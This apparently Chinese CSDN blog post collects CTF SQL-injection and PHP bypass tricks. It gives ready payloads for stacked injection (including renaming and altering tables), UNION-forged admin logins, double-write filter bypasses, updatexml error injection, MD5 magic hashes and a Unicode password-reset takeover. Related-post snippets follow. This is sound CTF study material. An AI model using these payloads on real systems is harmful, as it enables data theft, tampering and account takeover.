CTF-SQL注入总结

原创 已于 2022-03-21 23:11:15 修改 · 8.6k 阅读 · 22 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #web安全 #安全

于 2022-03-11 14:10:47 首次发布
本文详细介绍了多种Web安全漏洞,包括URL参数MD5加密绕过、堆叠注入、联合查询利用、关键词过滤绕过、Unicode编码绕过、PHP弱类型比较等,并给出了相应的解法和防护策略。通过实例展示了如何利用这些技巧进行安全测试和漏洞利用,同时也提醒开发者注意这些潜在的安全风险。

1、当URL地址传入的参数进行MD5加密时,可采用数组进行绕过。MD5对数组参数不会加密。

$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){ echo $flag;}

方法一:利用md5()函数的漏洞绕过
即使用数组绕过的方法:
由于md5对于字符串检验的时候,遇到数组会返回NULL 所以两个数组经过加密后得到的都是NULL,也就是相等的。
所以上传

/?a[]=1&b[]=2

方法二:利用“==”比较漏洞绕过
如果两个字符经MD5加密后的值为 0exxxxx形式,就会被认为是科学计数法,且表示的是0*10的xxxx次方,还是零,都是相等的。
下列的字符串的MD5值都是0e开头的:

QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a

2、堆叠注入

(查库)
1';show databases;#
(查表)
1';show tables;#
(查列)
1';show columns from `words`;
1';show columns from `1919810931114514`;

解法1
发现1919810931114514表中有flag,而words表中则是id和data,也就是说它原本是读取words表中的内容,我们只需要把words换成1919810931114514,将id列换成flag列就能读取flag了,然后再1'or 1=1#就有flag了

payload:1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` change flag id varchar(100);#

3、查询数据不存在时,联合查询会构造一个虚拟的数据在数据库中。

1’ union select 1,‘admin’,‘81dc9bdb52d04dc20036dbd8313ed055’#

可以试出回显的1,2,3哪个是用户名,哪个是密码, 这里利用联合查询构造了一个新数据admin pass:1234(MD5加密值)

4、关键词过滤

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
没有过滤show,可使用堆叠注入得到库名和表名
1';show databases;#			1';show tables;#
HANDLER也可作为查询语句,且性能比select更好,
payload:1';HANDLER FlagHere(表名) open;HANDLER FlagHere read first;HANDLER FlagHere close;#  固定语法

5、双写绕过

'uniunionon selselectect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#

'uniunionon selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables wherwheree table_schema='ctf'#

'uniunionon selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns wherwheree table_name='Flag'#

'uniunionon selselectect 1,2,group_concat(flag) frfromom ctf.Flag#

6、Unicode编码绕过

strlower():它将字符串中的所有大写字母转换为小写字母,并返回一个新字符串,

但碰到unicode编码例如ᴬᴰᴹᴵᴺ则会转化为ADMIN,接着看,在登陆处和改变密码处同样用到了strlower

首先注册时username填ᴬᴰᴹᴵᴺ,这时会调用strlower,于是就注册了一个username为ADMIN的用户,之后再用ᴬᴰᴹᴵᴺ进行登陆,又调用strlower,就能以ADMIN登陆,然后再改密码再一次调用strlower,把ADMIN变成了admin,这就达到了改admin密码的效果

7、过滤空格 —报错注入

payload: 'or(updatexml(1,concat(0x7e,(select(database())),0x7e),1))#
'or(updatexml(1,concat(0x7e(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek'))),0x7e),1))#
'or(updatexml(1,concat(0x7e(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1'))),0x7e),1))#
'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))#

8、PHP弱类型比较

php中有两种比较的符号 == 与 ===
    === 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较
    == 在进行比较的时候,会先将字符串类型转化成相同,再比较
    如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行

<?php
var_dump("admin"==0); //true
var_dump("1admin"==1); //true
var_dump("admin1"==1) //false
var_dump("admin1"==0) //true
var_dump("0e123456"=="0e4456789"); //true
?>

1.字符串“admin”与数值0比较,先将admin强制转化成数值,由于“admin”是字符串,不包含数字,所以转化结果为0,所以和数值0相等
2.字符串“1admin”包含数字1,强制转化为数值即1,所以==1。
3.“admin1“1 却等于错误,也就是”admin1”被转化成了0。

4.”0e123456”==”0e456789”相互比较的时候,会将0e这类字符串识别为科学技术法的数字,0的无论多少次方都是零,所以相等

字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值为0。

sql注入实验总结_CTF考点总结sql注入
weixin_34847198的博客
01-10 636
来自Kagi师傅(终于见到了CTF的职业选手了)总结,我的CTF生涯还有很多个6年(未开始)本文字数4000+,阅读时间约15分钟。整理下sql注入相关知识,查漏补缺(长期更新)常用语句及知识information_schema包含了大量有用的信息,例如下图mysql.user下有所有的用户信息,其中authentication_string为用户密码的hash,如果可以...
CTFSQL注入(get)
YkingH的博客
07-09 1025
CTFWEBSQL注入 SQL注入漏洞介绍 sql注入攻击指的是构建特殊的输入作为参数传入Web应用程序,而这些输入大都是sql语法里的一些组合,通过执行sql语句而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 sql注入产生的原因,通常表现在: 不当的类型处理 不安全的数据库配置 不合理的查询集处理 不当的错误处理 转义字符处理不合适 多个提交处理不当 信息探测 扫描主机服务信息及服务版本 nmap -sV 靶机ip地址 快速扫描主机全部信息 nmap
CTFSQL 注入 总结
algae
08-15 1137
思路 技巧 常见URL编码 # %23 工具 sqlmap 绕过
干货 | SQL 注入思路总结(非常详细):小白也能跟学,从判断漏洞到获取数据,零基础入门到精通,收藏备用!
最新发布
Button12138的博客
10-23 1695
SQL注入是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为称为SQL注入
CTF-SQL注入
weixin_44770698的博客
06-16 5790
CTF-SQL注入题目整理
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 6620
以pikachu靶场练习来学习ctf知识
CTF-Web SQL注入
weixin_52182264的博客
04-26 5580
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
CTF入门笔记之SQL注入
qq_37410729的博客
11-01 3383
sql注入
ctf-sql注入学习笔记
wwwyyyxxxx的博客
03-04 414
盲注:根据不同的输入得到的不同响应判断语句的正确性,进一步解flag,一般使用脚本或者sqlmap更方便,盲注又分为时间盲注和布尔盲注。sql注入原理:用户的输入未经检验或者成功逃逸,与sql语句拼接造成非法操作。时间盲注:根据页面的响应时间判断语句的真假一般使用if和sleep搭配使用。报错注入:利用特定函数的报错特性,使结果跟随报错一同输出。联合查询:使用union拼接其他语句查询。暂时写到这,有时间再写。
CTF-Show-SQL注入系列
2401_88326655的博客
12-12 1188
我们可以采用mysql中的replace函数绕过,将0-9数字替换成不同的字符,从而绕过。flag是包含数字的,因此我们需要将flag中的数字进行替换,从而将flag显示出来。将上述payload放在远端执行,burp抓包,进行url编码,填入id参数中。换句话来说,当username字段的值不为flag时,才可以进行显示。我们发现,sql语句中字段加反引号可以代替空格,得到的结果一样正确。使用上一题的payload,发现不行。我们将flag替换成1,那么就绕过了。我们输入id,就可以查询到用户。
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 852
个人CTF学习之路
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
总结笔记-CTF-SQL注入
qq_39283174的博客
12-22 620
关于SQL注入的相关CTF笔记
CTF-sql注入(X-Forwarded-For)
Reaches_r的博客
08-05 425
1.扫描目标IP发现只开了80http服务 2.进去有个登录界面,考虑sql注入得到账户密码 3.启动AWVS(AcunetixWeb Vulnarability Scanner)添加目标,扫描发现存在X-Forwarded-For注入漏洞 4.使用sqlmap注入攻击(--batch表示自动回应询问) (1)得到数据库名 (2)同理得到表名、列名,暴力破解出账户密码 5.登录后台,上传webshell,控制目标,具体步骤参考前面的文章。 ...
CTF--SQL注入
woshisz0413的博客
11-27 517
SQL注入思路: 1.是否存在SQL注入测试方法:(1)使用单引号’ (2)sqlmap:sqlmap.py -u http://******* 2.判断过滤的字符 SQL注入方式: (1)单引号’ (2)or/and 1=1 (3)order by --猜测字段长度 (&amp;&amp;与||绕过过滤) 例:order by 1… SQL绕过过滤方式: (1)某一关键字被过滤:1...
CTF入门之SQL注入
PolarPeak的博客
12-08 2612
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注)
m0_73734159的博客
12-09 1903
在进行布尔盲注攻击时,攻击者首先需要对目标应用程序进行SQL注入,然后根据页面返回的结果来判断注入是否成功。布尔注入是一种常见的SQL注入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。总之,布尔盲注是一种比较复杂的SQL注入攻击方式,需要攻击者具备一定的技术水平和耐心。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库中的相关信息。可知是字符型的布尔注入(盲注)
二、sql注入(CTF技巧)
黑日里不灭的light
03-14 1501
解释:在一些题目里面常常充满了各种各样的过滤,我们需要结合实际情况去进行注入,下面提供一些Payload以及适用场景。
CTF-10.sql注入(get)
woo233的博客
09-19 671
SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。
堆叠注入
09-13
堆叠注入是一种 SQL 注入技术,允许攻击者在一个正常的 SQL 查询之后追加一个或多个额外的 SQL 语句,这些语句会与原查询一起被数据库执行。 ### 原理 堆叠注入的原理基于数据库对多个 SQL 语句的处理机制。在许多数据库系统中,允许使用分号(;)来分隔不同的 SQL 语句。当应用程序在处理用户输入时,没有对输入进行严格的过滤和验证,攻击者就可以在正常的 SQL 查询后面添加额外的 SQL 语句,通过分号分隔,从而实现堆叠注入。例如,引用[1]中的例子“?id=-1';insert into users(id,username,password) value(99,'wwwcn','123456'); --+”,攻击者在原查询基础上通过分号追加了一条插入数据的语句。 ### 危害 堆叠注入的危害与 SQL 注入攻击的危害类似,可能会导致严重的安全问题: - **数据泄露**:攻击者可以通过堆叠注入执行 SELECT 语句,访问数据库中的敏感数据,如用户的个人信息、商业机密等。 - **数据篡改**:攻击者可以使用 INSERT、UPDATE 或 DELETE 语句插入虚假数据、修改现有数据或删除重要数据,影响数据的完整性和可用性。 - **权限提升**:攻击者可能通过堆叠注入执行能够提升权限的 SQL 语句,获取高权限用户的访问权限,从而对数据库进行更高级别的操作。 - **拒绝服务**:攻击者可以执行复杂的查询或命令,使数据库过载,导致应用程序无法正常工作,影响业务的正常运行。 ### 防范方法 为了防范堆叠注入攻击,可以采取以下措施: - **输入验证**:对用户输入进行严格的验证和过滤,只允许合法的字符和格式。可以使用白名单机制,只允许特定的字符和输入格式通过。 - **使用参数化查询**:使用参数化查询(如预编译语句)可以有效地防止 SQL 注入。参数化查询将 SQL 语句和用户输入分开处理,数据库会自动对输入进行转义,避免 SQL 注入的风险。 - **最小化数据库权限**:确保数据库用户账户具有最小的必要权限,限制攻击者在成功注入后能够执行的操作。 - **错误处理**:避免在应用程序中显示详细的数据库错误信息,防止攻击者利用错误信息进行进一步的攻击。 ```python # 使用 Python 和 SQLite 进行参数化查询的示例 import sqlite3 # 连接到数据库 conn = sqlite3.connect('example.db') cursor = conn.cursor() # 用户输入 user_input = '1 OR 1=1' # 使用参数化查询 query = "SELECT * FROM users WHERE id = ?" cursor.execute(query, (user_input,)) # 获取查询结果 results = cursor.fetchall() print(results) # 关闭连接 conn.close() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值